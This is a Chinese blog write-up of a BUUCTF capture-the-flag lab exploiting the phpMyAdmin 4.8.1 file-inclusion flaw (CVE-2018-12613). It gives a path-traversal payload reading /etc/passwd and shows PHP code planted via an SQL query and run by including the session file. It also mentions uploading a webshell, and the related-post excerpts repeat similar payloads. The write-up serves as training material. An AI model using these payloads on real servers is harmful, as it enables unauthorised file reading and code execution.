BUUCTF[PHPMYADMIN]CVE-2018-12613

最新推荐文章于 2024-02-02 21:42:25 发布
最新推荐文章于 2024-02-02 21:42:25 发布
阅读量1.8k 收藏 3
点赞数 2
分类专栏: ctf刷题记录 文章标签: web安全 安全 php web app 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124392644
版权

打开所提供的网址

是个phpmyadmin界面

phpmyadmin的版本号为4.8.1

在phpmyadmin的版本号为4.8.1以及4.8.0的版本中有着包含(查看并可能执行)服务器上的文件的漏洞,详情可看这篇文章

phpMyAdmin 是一套开源的、基于Web的MySQL数据库管理工具。在 4.8.2 之前的 phpMyAdmin 4.8.x 中发现了一个问题,其中攻击者可以在服务器上包含文件。该漏洞来自 phpMyAdmin 中重定向和加载页面的部分代码,以及对白名单页面的不当测试。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

CVE-2018-12613 PHPmyadmin文件包含漏洞分析及漏洞利用

我们尝试一下任意文件包含

index.php?target=sql.php?/../../../../../../../../../etc/passwd

 执行成功

写入一个phpinfo文件

SELECT '<?php phpinfo()?>'

 

执行成功

查看我们的session,我们输入的这一段php代码其实已经保存在服务器中了。

 我们利用尝试包含session文件,出现phpinfo()。

/index.php?target=sql.php?/../../../../../../../../../tmp/sess_c4f4559797ee11b36826474f973af72b

 

往下翻看到flag

 

这里我一开始还是直接上传了一个小马,结果蚁剑上一直没找到flag文件,后面又翻了phpinfo的页面才查看到的flag

H3018-R
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
03-02
phpMyAdmin 4.0.1--4.2.12 本地文件包含漏洞(CVE-2014-8959)-附件资源
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3626
CTF综合靶场渗透系列-Billu_b0x
一道sql注入的ctf题目致使用phpmyadmin上传 webshell 拿后台权限
最新发布
carrot11223的博客
02-02 1279
于是变成了这样子,然后我抛出所有的库,在库里面找到一个比较可疑的库,然后跑所有的表,找了一个可能包含用户名密码的表,抛出里面的内容,我发现确实很快,那为什么之前一直那么慢呢?5. PHPS文件泄露,phps文件就是php的源代码文件,通常用于提供给用户(访问者)直接通过Web浏览器查看php代码的内容。跑了一堆杂货,于是我又去跑了目录,发现有http://c63d6b5a18c915cb.node.nsctf.cn/phpmyadmin/index.php,还以为上面的东西就是账号和密码,白高兴一场。
BUUCTF(10.25-11.1)
qq_52988816的博客
11-23 3550
[GWCTF 2019]我有一个数据库 考点是phpmyadmin 进入该页面 phpmyadmin4.8.0-4.8.1存在文件包含漏洞 使用网上的payload直接打 先测试能不能用该数据库 payload ?target=db_datadict.php%253f/../../../../../../../../etc/passwd 发现有回显后我们改成flag http://57a7979b-f822-4a63-8bcb-3e76fa076462.node4.buuoj.cn/phpmyadmin/?
墨者学院CTF(phpMyAdmin后台文件包含分析溯源)
痴人说梦梦中人
09-11 2980
墨者学院CTF(phpMyAdmin后台文件包含分析溯源) 靶场地址: http://219.153.49.228:45122/ 相关知识: 1.phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 2.php代码审计 3.base64编码绕过 思路: 利用过滤规则绕过php文件包含的黑白名单限制,再利用php的session会话机制,包含一句话木马文件获取shell...
buuctf [PHPMYADMIN]CVE-2016-5734
qq_1873822的博客
03-19 553
漏洞简介 phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。在其查找并替换字符串功能中,将用户输入的信息拼接进preg_replace函数第一个参数中。 在PHP5.4.7以前,preg_replace的第一个参数可以利用\0进行截断,并将正则模式修改为e。众所周知,e模式的正则支持执行代码,此时将可构造一个任意代码执行漏洞。 以下版本受到影响: 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,
小白也可以看懂的漏洞分析(CVE-2018-12613)
西西弗斯的巨石
05-20 4262
漏洞编号CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。本篇文章主要侧重于对该漏洞的原理进行分析,并给出利用该漏洞的方法。并介绍了理解该漏洞的背景知识。
CVE-2018-12613phpMyAdmin文件包含漏洞复现
顶峰
03-29 575
漏洞
CVE-2018-12613[远程文件包含漏洞]复现
L1ni01
12-01 2423
CVE-2018-12613[远程文件包含漏洞]复现 0x00漏洞介绍 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外: $ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码; $ cfg [‘ServerDefault’] = 0:这会绕过登录并
【CVE】CVE-2018-12613:windows 复现 phpMyAdmin 本地文件包含造成远程代码执行漏洞
边扯边淡
11-24 812
起序:在做 Web 题遇到的,复现一下。 一、靶场环境 VMware Workstation 15.5 Pro cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso phpStudy 2018 phpMyAdmin-4.8.1-all-languages 二、漏洞分析 1、本地文件包含 LFI(本地文件包含),是指当服务器开启 allow_url_include 选项时,就可以通过php的某些特性函数 include(),require()和inclu
CVE-2018-12613:本地文件包含
m0_66299232的博客
07-04 520
phpMyAdminphpMyAdmin团队开发的一套免费的、基于Web的MySQL数据库管理工具。该工具能够创建和删除数据库,创建、删除、修改数据库表,执行SQL脚本命令等。CVE-2018-12613,这是一个在phpMyAdmin4.8.x(4.8.2之前)上发现的文件包含漏洞,攻击者可以利用该漏洞在后台进行任意的文件包含。也就也为着攻击者可以通过webshell直接拿下搭建了该服务的站点。
phpmyadmin 远程文件包含漏洞(CVE-2018-12613) - tdcoming'blog QQ group 906
08-04
漏洞背景背景介绍phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具…阅读数 156博文CVE-2018-12613 --- 本地文件包含造成
CVE-2020-11890:CVE-2020-11890
03-10
香港制造 CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 ...MySQL:root:root(可以通过IP:8080 / phpmyadmin访问) s
ctf---pzctf赛前测试题
weixin_40709439的博客
11-22 1357
title:pzctf赛前测试题 0x01 phpmyadmin后台文件包含 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发。 CVE-2018-12613 PhpMyadmin后台文件包含分析,影响版本如下: phpMyAdmin 4.8.0和4.8.1受到影响。 第一题:点进去是一个phpmyadmin登陆后台(普通权限) 第一时间想到是into oufil...
buuctf [PHPMYADMIN]CVE-2018-12613
qq_1873822的博客
03-16 669
phpMyAdmin版本信息:4.8.1 这里漏洞技术细节(涉及代码段、原理等)我上个链接 https://blog.csdn.net/jiyongx/article/details/105240498 任意文件包含 payload /index.php?target=tbl_sql.php%253f/…/…/…/…/…/…/…/…/etc/passwd 写入shell 第一种姿势 1、写入shell,测试语句: SELECT ‘<?php phpinfo()?>’ index.php?ta.
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
weixin_55821558的博客
04-26 716
环境:php 5.5.30 工具:phpstudy(小皮面板) 这个漏洞是源于phpmyadmin中的index.php,下面是源码: 以上进行一下分析: 1.传入的target不能为空 2.必须是一个字符串 3.不能以index开头 4.不能再数组target_blacklist中 5.且经过checkPageValidit检查后为真 首先前三个都很好理解 我们先看一下第四个 黑名单为: 在index.php中,已经事先定义了target_blacklist的值,即import.php和ex
phpMyAdmin后台文件包含漏洞(CVE-2018-12613)
weixin_47493074的博客
09-17 503
phpMyAdmin文件包含漏洞复现(CVE-2018-12613)
CVE-2018-12613 Phpmyadmin文件包含漏洞
weixin_51339377的博客
03-17 502
phpMyAdmin文件包含漏洞 利用条件: phpMyAdmin 4.8.0-4.8.1版本 用户已经拥有登录进入phpmyadmin后台的账号和密码 phpmyadmin配置文件位置 WWW\phpMyAdmin4.8.0\libraries\config.default.php 以下情况下攻击者在phpmyadmin中被重定向和加载,以及对白名单页面进行不正确的测试不需要身份验证: $cfg['AllowArbitraryServer']=true #攻击者可以指定.
CTF reverse
12-25
CTF reverse(CTF逆向工程)是指在CTF竞赛中涉及到的逆向分析和破解技术。逆向工程是通过对软件进行反汇编、反编译等操作,来理解其内部结构和实现原理的过程。在CTF reverse中,参赛选手需要具备较强的逆向分析能力,能够通过逆向分析来猜测软件的功能和实现思路,并进行验证。 CTF reverse的主要目标是解决给定的逆向工程问题,例如破解密码、还原加密算法、分析恶意软件等。参赛选手需要使用逆向工程技术来分析和理解给定的程序或者二进制文件,找出其中隐藏的信息和漏洞,并利用这些信息来解决问题。 在CTF reverse中,常用的工具包括IDA Pro、OllyDbg、Ghidra等。参赛选手可以使用这些工具来进行反汇编、反编译、调试等操作,以便深入理解程序的运行机制和逻辑。 总结起来,CTF reverse是一项需要逆向分析能力的竞赛项目,参赛选手通过对软件进行逆向工程来解决给定的问题。这需要他们具备扎实的逆向分析技术和对计算机系统的深入理解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值